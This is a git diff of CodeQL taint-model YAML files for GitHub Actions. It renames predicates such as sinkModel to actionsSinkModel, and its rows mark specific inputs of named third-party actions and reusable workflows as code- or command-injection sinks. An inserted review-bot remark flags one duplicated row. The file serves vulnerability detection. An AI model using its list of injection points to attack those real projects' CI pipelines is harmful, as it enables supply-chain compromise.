 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
index adea8ae4bd2c..89559cf57e3f 100644
--- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
index 857c946e2b78..6292841e56ad 100644
--- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
index 717022ea6e83..9f98fd51139d 100644
--- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"]
 - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
index 7dadb99209db..e04605511b89 100644
--- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"]
 - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
index ca3cb0091e90..a77181e6c4eb 100644
--- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"]
 - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
index 6faf8b900578..6c90e29a43bf 100644
--- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
index 39b6773a2b19..6bacbc181daa 100644
--- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"]
 - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
index cbbce950b419..83d438d4e3d4 100644
--- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"]
 - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
index 48206551bcd0..703a766cb4cb 100644
--- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"]
 - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
index 256ad3f0e042..ecb4c809efe4 100644
--- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
index ae408b131e08..9b02577be7d3 100644
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"]
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"]
@@ -9,6 +9,6 @@ extensions:
 - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml
index c7e2cf41b3f6..1ffc3df1c815 100644
--- a/ql/lib/ext/getsentry_action-release.model.yml
+++ b/ql/lib/ext/getsentry_action-release.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"]
 - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"]
diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml
index 781384a2fe19..53ed1840b0a1 100644
--- a/ql/lib/ext/github_codeql-action.model.yml
+++ b/ql/lib/ext/github_codeql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"]
diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml
index 9036f199f424..17d2ed2e4735 100644
--- a/ql/lib/ext/go-semantic-release_action.model.yml
+++ b/ql/lib/ext/go-semantic-release_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"]
diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml
index 7eee95dbcce4..68c2552c3505 100644
--- a/ql/lib/ext/golangci_golangci-lint-action.model.yml
+++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
index 4fe9e32ce521..977f6b98ae4b 100644
--- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
+++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"]
 - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"]
diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
index 0352ece87b52..616f7fdb9ca8 100644
--- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml
+++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
index 712f2ce3395c..e4961ae5ed63 100644
--- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
+++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"]
 - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml
index 45c00c1c30ea..19cce83c691d 100644
--- a/ql/lib/ext/gradle_gradle-build-action.model.yml
+++ b/ql/lib/ext/gradle_gradle-build-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"]
 - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"]
diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml
index 8f05918155ed..f838eeed0eb8 100644
--- a/ql/lib/ext/haya14busa_action-cond.model.yml
+++ b/ql/lib/ext/haya14busa_action-cond.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"]
 - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml
index 708c310c05f4..48e5b05128f8 100644
--- a/ql/lib/ext/hexlet_project-action.model.yml
+++ b/ql/lib/ext/hexlet_project-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"]
diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
index 761776358994..448997b3136e 100644
--- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
+++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"]
 - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"]
diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml
index 7106115c17a2..13af446f37d1 100644
--- a/ql/lib/ext/ilammy_setup-nasm.model.yml
+++ b/ql/lib/ext/ilammy_setup-nasm.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"]
 - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"]
diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml
index 366e5dd17667..39e1c9ef6240 100644
--- a/ql/lib/ext/imjohnbo_issue-bot.model.yml
+++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"]
 - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml
index a469063fc503..a442ed5cd531 100644
--- a/ql/lib/ext/iterative_setup-cml.model.yml
+++ b/ql/lib/ext/iterative_setup-cml.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml
index d0d5b57574b5..a22fce01c453 100644
--- a/ql/lib/ext/iterative_setup-dvc.model.yml
+++ b/ql/lib/ext/iterative_setup-dvc.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
index 3151e335d22d..74a5c7d592c7 100644
--- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
+++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"]
 - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index e74f953a1a15..e78dfb3b073d 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
 - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"]
diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
index 0930fc246c38..29dac5cffeaa 100644
--- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml
+++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
index 5b344799ad95..f2331633485c 100644
--- a/ql/lib/ext/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
 - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
index 5b6f1342fc42..e492f6012788 100644
--- a/ql/lib/ext/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
 - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
index b34833d85f3a..a821b049232a 100644
--- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
 - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index 9a58d9a764ff..4f9f887caf1f 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
 - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
index 74ef5820cb7a..365f3ac98f88 100644
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
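Review bot: The khan/pull-request-comment-trigger hunk keeps an exact duplicate row on the new side — `- ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]` appears twice in a row under `data:` — and the commit, which only renames `sourceModel` to `actionsSourceModel`, leaves it as is. A repeated tuple in an extensible predicate is most likely a copy-paste slip that was meant to model a second output of that action, so as written one source is silently unmodelled. Either delete the second line or replace its `output.comment_body` with the output it was intended to cover; I cannot tell from this diff which output that is, so it needs a look at the action's metadata. The other hunks on this line (jurplel/install-qt-action, jwalton/gh-ecr-push) look internally consistent.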
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml
index e05a3afd63a5..f42e84655338 100644
--- a/ql/lib/ext/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
 - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
index a96ad45d624e..e21b52241667 100644
--- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
index a70e8facf7c1..6c4a5931b98f 100644
--- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 66280f8bdd64..c7e89697afb6 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
 - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
index 65965daeb1d4..aa8496038365 100644
--- a/ql/lib/ext/magefile_mage-action.model.yml
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
index ba9a04f588bf..ae869b6b5313 100644
--- a/ql/lib/ext/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
 - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
index aea054e24b0a..9f5801b79c04 100644
--- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
 - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"]
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml
index c8646cffe8ef..a4a473b8efd2 100644
--- a/ql/lib/ext/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/marocchino_on_artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index bb1c3ffca2a0..10a03e4d1863 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -1,13 +1,13 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"]
 - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
 - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
index d3bec5ea39d0..9af82b985f31 100644
--- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
index c65527150b5c..3b779d0b86d8 100644
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
index 25565b445fca..6ad087730e41 100644
--- a/ql/lib/ext/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
 - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"]
diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
index d46a07dde969..fa9c19583524 100644
